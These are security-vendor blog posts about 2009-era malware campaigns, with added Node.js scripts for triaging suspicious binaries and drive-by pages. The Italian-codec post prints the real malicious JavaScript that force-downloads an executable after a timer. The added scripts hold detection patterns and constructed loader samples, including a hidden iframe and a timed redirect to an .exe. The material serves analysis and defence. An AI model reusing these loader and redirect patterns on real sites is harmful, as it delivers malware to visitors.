Sophos

SophosLabs informs on dodgy files

I have just returned from the Queensland Hi Tech Crime Symposium hosted by the Queensland State Crime Operations Command, where the hot topics of eFraud and eCrime were discussed.

My presentation on the rising abuse of trusted file formats such as Word, PDF and Flash was well received (despite the fact I’m no public speaker extraordinaire!). The other presentations discussed the variety, extent and sophistication of eCrime plaguing our modern connected society, and ways in which law enforcement, government, the private sector and, most importantly, netizens can stem the tide.

Of particular interest was the taxonomy of two separate eCrime cases, which showed that even the tech-savvy can, and do, fall victim to phishing and eFraud, often perpetrated by not-so-technically-endowed individuals or groups.

Overall the conference was of great benefit to all involved and shows how cooperation between various public, private and government bodies can yield benefits for everyone.



Troj/BHO-MQ more than meets the eye

One of the most difficult types of malware SophosLabs analysts face is the kind that appears to do nothing. Last week a colleague came across a file that appeared to do nothing and asked me to help dig deeper.

He found what looks like JavaScript in the code section of the binary.

The rest of the code manipulates what Internet Explorer sees and will insert this JavaScript into pages.

The JavaScript is heavily obfuscated and decodes to:

So far SophosLabs have seen 7 different domains used by variants of Troj/BHO-MQ, all of which use the path /fcontent/index.html. The websites linked to are all Russian porn sites with the following enticing graphics.

Why is the Trojan doing this? I suspect that this Trojan is part of a pay-per-click scam and is used to generate revenue for a hacking gang.
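Here is an added example of the kind of first-pass triage that surfaces this sort of sample: a short Node.js script that is mine, not part of the original analysis or a SophosLabs tool. It pulls printable strings out of a binary the way `strings` does, undoes the usual %XX and \xXX escaping, and looks for JavaScript markers and URLs, flagging any URL that ends in the /fcontent/index.html path mentioned above. The embedded sample bytes are constructed, and the example-placeholder.invalid hostname stands in for the real domains, which are not reproduced here.

```javascript
// Added triage example (not SophosLabs code): find web script hidden in a binary.
// Works on raw bytes like `strings`, then looks for JavaScript markers and URLs
// in the extracted runs.

const SCRIPT_MARKERS = [
  /<script[\s>]/i,
  /document\.write\s*\(/i,
  /location\.href\s*=/i,
  /\bunescape\s*\(/i,
  /\bString\.fromCharCode\s*\(/i,
  /\beval\s*\(/i,
];
const URL_RE = /https?:\/\/[A-Za-z0-9.-]+(?:\/[^\s"'<>)]*)?/g;
// Path shared by every Troj/BHO-MQ landing site seen so far (from the post above).
const FAMILY_PATH = '/fcontent/index.html';

// Printable ASCII runs; tab/newline are allowed so multi-line script stays in one run.
function printableRuns(buf, minLen = 8) {
  const runs = [];
  let cur = '';
  for (const b of buf) {
    if ((b >= 0x20 && b <= 0x7e) || b === 0x09 || b === 0x0a || b === 0x0d) {
      cur += String.fromCharCode(b);
    } else {
      if (cur.length >= minLen) runs.push(cur);
      cur = '';
    }
  }
  if (cur.length >= minLen) runs.push(cur);
  return runs;
}

// Undo %XX and \xXX escaping so URLs hidden behind unescape() become visible.
function deobfuscate(s) {
  const hex = (_, h) => String.fromCharCode(parseInt(h, 16));
  return s.replace(/\\x([0-9a-fA-F]{2})/g, hex).replace(/%([0-9a-fA-F]{2})/g, hex);
}

function triageBinary(buf) {
  const runs = printableRuns(buf);
  const scriptFragments = runs.filter((r) => SCRIPT_MARKERS.some((re) => re.test(r)));
  const urls = new Set();
  for (const r of runs) {
    for (const m of deobfuscate(r).matchAll(URL_RE)) urls.add(m[0]);
  }
  const familyHits = [...urls].filter((u) => u.endsWith(FAMILY_PATH));
  let verdict = 'no script indicator';
  if (scriptFragments.length > 0) {
    verdict = familyHits.length > 0
      ? 'script injector with BHO-MQ-style landing path'
      : 'embedded script, unknown family';
  }
  return { scriptFragments, urls: [...urls], familyHits, verdict };
}

// Constructed sample: an MZ-like header, a script string whose iframe target is
// hidden behind unescape(), and some trailing junk. The hostname is a placeholder.
function sampleBinary() {
  const head = Buffer.from([0x4d, 0x5a, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00]);
  const js = Buffer.from(
    '<script>document.write(unescape("%3Ciframe src=http://example-placeholder.invalid' +
      '/fcontent/index.html width=1 height=1%3E%3C/iframe%3E"))</script>',
    'latin1'
  );
  return Buffer.concat([head, js, Buffer.from([0x00, 0xff, 0xc3])]);
}

console.log(JSON.stringify(triageBinary(sampleBinary()), null, 2));
```

This is a string-level heuristic only: it catches script stored in the clear or behind simple escaping, which is what an analyst checks first, but a sample that builds its payload at runtime needs dynamic analysis (watching what the BHO writes into IE's DOM) rather than a strings pass.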



Recession Bites Hard For The Rich And Famous

Today we have seen a couple of HTML files which redirect to an online shop selling fake watches (or, as they like to call it, “a copy of the original”).

Sophos detects these files as JS/Agent-KLD and JS/Agent-KLE respectively.

When these HTML files are opened in a browser, the embedded link goes to the shop’s main webpage (access to which is blocked by Sophos’s web appliance).

From its dynamic advertising, we see some famous faces like Bill Gates, Brad Pitt and Angelina Jolie. While we are guessing they don’t get paid for their images to be used, it’s pretty certain that they DON’T buy fake watches from this website. ;-)

Neither should you!



Update on the DirectShow vulnerability du jour

As already mentioned by GC here, there is a DirectShow vulnerability currently in the wild.

Samples seen thus far are detected as Exp/VidCtl-A and Mal/JSShell-D, and several new variants of the exploit scripts are being proactively detected under these names. Runtime buffer overflow protection adds a behavioral layer on top of that.

The payloads attackers are attempting to infect victims with vary between attacks, but include:

Additionally, ensuring that the runtime protection offered by HIPS is enabled provides another level of protection, proactively detecting new attacks.

For those of you who want the security provided by Microsoft’s workaround, but don’t want to fiddle with the registry manually, Microsoft has provided some interesting tools that seem to simplify the procedure to a turnkey solution here.



4th of July malware campaign trends

A quick search through our blogs for 4th of July malware campaigns over the past three years shows:

  • 4th of July 2007, we experienced a large e-card campaign which we then detected as Troj/JSEcard-A and Mal/Dorf-C.
  • 4th of July 2008, we experienced another large Dorf campaign this time attempting to show the users a video of fireworks; we detected this as Troj/Dorf-BP and Mal/ObfJS-AY.
  • 4th of July 2009, we experienced a Waled campaign attempting to show the users a YouTube video of fireworks; we detected this as Mal/WaledPak-G and Mal/WaledJS-A.

My predictions for 4th of July 2010, based on the experiences of the past three years: possibly another Waled campaign, this time focusing on something other than fireworks or e-cards. Maybe something more creative than fireworks? It’s getting a bit stale.

Also the campaign may not necessarily be another Waled, but given how long Dorf has been used and continues to be used, reusing Waled may not be unrealistic. The malware authors will just tweak the code and redeploy.



4th of July Waled

No surprises here, a new Waled campaign with the US Independence Day theme. When the user clicks on the YouTube video link, it offers to download an .exe file to the user’s computer instead of displaying a video.

Funny thing is that they say on the webpage “The largest firework happened this Saturday”, and this campaign is being spammed out on Friday, July 3rd. Clearly the Waled group isn’t paying attention to international timezones. Sophos detects this new Waled campaign as Mal/WaledPak-G and Mal/WaledJs-A.

Page displaying a Youtube video link which when clicked downloads the Waled executable



Amazon and Sophos

The work that the guys carry out in the lab is pretty varied. We do everything you would expect - analyse malware, publish descriptions and protection, analyse spam, check out websites that are supposedly compromised, answer plenty of customer queries and research latest malware techniques. That’s the short list. Then I could talk about all the projects that the analysts work on, developing new technologies and then getting them into the product to help with detecting all the latest threats - even crystal ball gazing to see where the threat might be moving and designing pre-emptive technologies for the Sophos product range.

Every year there are new products developed with the latest detection technologies. This year is no exception and Sophos is about to embark on a Beta program for its new products and we are looking for customers to join that program to help evaluate the latest offerings.

If you are interested in taking part then please check out http://www.sophos.com/products/beta/ and join in the program. I’m told there are Amazon vouchers available for those who provide feedback - I wonder if they’ll let me join.



International MJ Conspiracies With a Payload

Yes, sadly we’re still talking about people taking advantage of Michael Jackson’s death.

This week, we’ve seen a rise in malware purporting to show images and video leading up to Michael’s death — many malware groups around the world appear to be getting in on the act.

MJ X-Files Mail Message


MJ X-Files Web Content


Anyone taking the standard precautions shouldn’t have difficulty avoiding this one: keep JavaScript disabled by default, so that the Mal/ObfJS-BP script in the 1×1 iFrame never runs (it tries to download and run the EXE via an old Acrobat Reader vulnerability), and don’t run the linked EXE manually, which would infect you with Troj/ZBot-GJ (everyone knows that clicking on EXEs on a web page is a bad idea, right?).

While most of the malware is following this format, the Italians are getting a bit more creative:

MJ Italian Video Message


For those of you following along who don’t read Italian, my rough translation of the text is as follows:

The whole world was devastated when Michael Jackson was found dead.
His death is surrounded with mystery; no one knows what happened, only that the mega star is dead.
But not just that. The following video clip shows Michael’s last moments and the cruel truth about his death.
Watch it and do not forget to leave a flower on Michael’s grave.
SHOCKING IMAGES! This video is not suited for children under the age of 16

This message contains a link to the following site:

"Youtube" missing codec warning

The site, purporting to be an Italian YouTube site, throws up an error saying that you need to update your Flash player to view the video, with a download link to the fake codec malware Troj/ZBot-GK. It also contains the following JavaScript code that I found very interesting:


<!--
function doDownload() {
    // Genera il link al file zippato da scaricare
    // (tr. Generate the link to the zipped file to download; the link is in fact an .exe)
    location.href = "http://youtube****.com/Codec/120.exe";
}

// Fa partire il download dopo 10 secondi da quando
// l'interprete JavaScript ha rilevato la funzione
// (tr. Start the download 10 seconds after the JavaScript interpreter has read the function;
//  the delay actually passed is 4000 ms, i.e. four seconds)
window.setTimeout("doDownload()", 4000);
//-->

This code navigates the browser to the linked “codec” (an .exe, despite the comment’s reference to a zipped file) as soon as the timer fires, 4000 ms or four seconds after the script runs, regardless of whether the user does anything on the page; the comment’s ten seconds does not match the code. What I find interesting is that the script is well formatted and commented in Italian, and appears to be designed to force-download a zipped file. This implies that you can expect to see other Italian-targeted malware of this kind in the future.
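As an added example (my code, not anything from the original post or the malware), here is a static check in Node.js that flags the two delivery tricks described in this post: the 1×1 iFrame from the X-Files emails and the timed location.href redirect to an executable from the Italian codec page. It would also flag a page like the 4th of July Waled one, whose “video” link fetches an .exe. The sample HTML is constructed, and the hostnames in it (mj-placeholder.invalid, youtube-placeholder.invalid, example.invalid) are placeholders, not the real sites.

```javascript
// Added example (not from the original post): static triage for drive-by pages.
// Flags hidden or tiny iframes, setTimeout-driven location.href redirects, and
// direct links to executables.

const EXE_URL_RE = /https?:\/\/[^\s"'<>)]+\.(?:exe|scr|pif)\b/gi;
const IFRAME_RE = /<iframe\b([^>]*)>/gi;
const ATTR_RE = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;
// setTimeout("name()", ms), setTimeout('name()', ms) or setTimeout(name, ms)
const SET_TIMEOUT_RE = /setTimeout\s*\(\s*(?:"([^"]+)"|'([^']+)'|([A-Za-z_$][\w$]*))\s*,\s*(\d+)/g;
// Function declarations without nested braces: enough for one-line loader stubs.
const FUNC_RE = /function\s+([A-Za-z_$][\w$]*)\s*\([^)]*\)\s*\{([^{}]*)\}/g;
const HREF_ASSIGN_RE = /(?:window\.|document\.)?location(?:\.href)?\s*=\s*["']([^"']+)["']/;
const TINY = new Set(['0', '1', '0px', '1px']);

function firstDefined(...xs) {
  return xs.find((x) => x !== undefined);
}

function parseAttrs(s) {
  const attrs = {};
  for (const m of s.matchAll(ATTR_RE)) {
    attrs[m[1].toLowerCase()] = firstDefined(m[2], m[3], m[4]).trim();
  }
  return attrs;
}

// 1x1, zero-size or display:none iframes: the classic invisible loader.
function hiddenIframes(html) {
  const hits = [];
  for (const m of html.matchAll(IFRAME_RE)) {
    const a = parseAttrs(m[1]);
    const tiny = TINY.has(a.width) || TINY.has(a.height);
    const hidden = /display\s*:\s*none|visibility\s*:\s*hidden/i.test(a.style || '');
    if (tiny || hidden) hits.push({ src: a.src || '', width: a.width, height: a.height });
  }
  return hits;
}

// A timer that calls a function whose body assigns location.href: a forced
// navigation that fires after a fixed delay, whatever the user does on the page.
function timedRedirects(html) {
  const bodies = {};
  for (const m of html.matchAll(FUNC_RE)) bodies[m[1]] = m[2];
  const hits = [];
  for (const m of html.matchAll(SET_TIMEOUT_RE)) {
    const target = firstDefined(m[1], m[2], m[3]).replace(/\s*\(\s*\)\s*;?\s*$/, '');
    const body = bodies[target];
    if (!body) continue;
    const assign = HREF_ASSIGN_RE.exec(body);
    if (assign) hits.push({ func: target, delayMs: Number(m[4]), url: assign[1] });
  }
  return hits;
}

function executableLinks(html) {
  return [...new Set([...html.matchAll(EXE_URL_RE)].map((m) => m[0]))];
}

function triageHtml(html) {
  const iframes = hiddenIframes(html);
  const redirects = timedRedirects(html);
  const exeLinks = executableLinks(html);
  const suspicious = iframes.length > 0 || redirects.length > 0 || exeLinks.length > 0;
  return { iframes, redirects, exeLinks, suspicious };
}

// Constructed sample modelled on the pages described above; hostnames are placeholders.
function sampleCodecPage() {
  return [
    '<html><body>',
    '<p>To view this video you need to update your Flash Player.</p>',
    '<iframe src="http://mj-placeholder.invalid/x-files/index.php" width="1" height="1"></iframe>',
    '<script type="text/javascript">',
    '<!--',
    'function doDownload() {',
    '  // build the link to the "codec" and navigate to it',
    '  location.href = "http://youtube-placeholder.invalid/Codec/120.exe";',
    '}',
    'window.setTimeout("doDownload()", 4000);',
    '//-->',
    '</script>',
    '</body></html>',
  ].join('\n');
}

console.log(JSON.stringify(triageHtml(sampleCodecPage()), null, 2));
```

The check is deliberately regex-based so it runs offline over a captured page with no DOM library; that also means it only sees what is in the static source. An obfuscated script that builds the iframe or the URL at runtime (as in the Mal/ObfJS-BP case above) has to be executed in a sandbox and its DOM writes inspected before the same checks apply.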

You’re still safe as long as you keep JavaScript disabled for untrusted websites and don’t download the EXE. But downloading the “update” can be a bit more tempting than in the previous example.

Not to worry… Sophos blocks the e-mails, the websites, and the malware, so reading this blog is likely the closest you’ll come to this sordid display of opportunism.



Social networking and security

I saw yet another article today on the rise in cybercrime on Facebook http://www.reuters.com/article/newsOne/idUSTRE55S55820090629

We’ve been talking about the dangers of Facebook and Twitter for a couple of years now [1], [2], [3], [4], [5], [6].

This seems to be bringing back to the forefront the argument for locking down business networks to prevent access to these sites. Previous arguments have usually been limited to productivity drains, but as malware on these sites rises, security should be the overriding concern. The potential for information leaks from employees posting to these sites is increasing, as is the possible damage from malware being sent from a corporation’s compromised network. And there’s still the whole cybersquatting issue, which also seems to be rising. There are companies that have been targeted with fake Facebook and Twitter profiles, which could potentially damage the company’s reputation.

With these considerations, should businesses lock down access to these sites at the risk of upsetting their employees?



“She’s armed with technology”

… but is she security conscious?

I was reading my RSS reader when I came across this blog article from the WSJ: http://blogs.wsj.com/digits/2009/06/26/how-moms-feel-about-social-media/?mod=rss_WSJBlog and it really got me thinking. How many of these sites have been set up securely? How many of these moms are putting up their private details not thinking about the possible consequences of what happens if the site gets compromised?

Many of these sites are set up by women (and men) with the best of intentions. They either have a bit of tech knowledge or they hire someone with the coding experience to set up the website. They make sure that they have some of the bells and whistles like private messaging, email lists, and message boards. The user interfaces are scrutinized to make sure they are user-friendly and easy to navigate. But how much attention is given to whether there are vulnerabilities in the server that is running the software? Who maintains the server and makes sure it’s patched and has AV on it? Is the software itself buggy and vulnerable to attack? Are they doing enough to protect their users?

Here’s a great example. I’m a member of several mom-centric social networks. One of which was in fact compromised. The servers had been compromised with an SQL injection attack. The hackers then trashed many of the templates for the site (fortunately they had decent backups and could restore the templates) and stole all the user information, including things like birthdays, usernames, passwords and email addresses. They sent a broadcast once control of the site was regained, but the damage was done. Every user had been compromised and their info was out in the world.

All except mine.

I never give correct personal details (such as birthdays) to websites.  While I appreciate that in general such information is collected for demographic stats, there really is no need for specific birthdays, mother’s maiden names, etc. More people should really think about what it is they put on the enrollment forms. With a name, address and birthdate, identities can be stolen.

Security here is two-fold. Not only should the site be secure, but the people using them should also be wary and on the lookout for links from people they may or may not know, not giving out personal details and using secure passwords that are not the same as their email passwords or banking passwords.

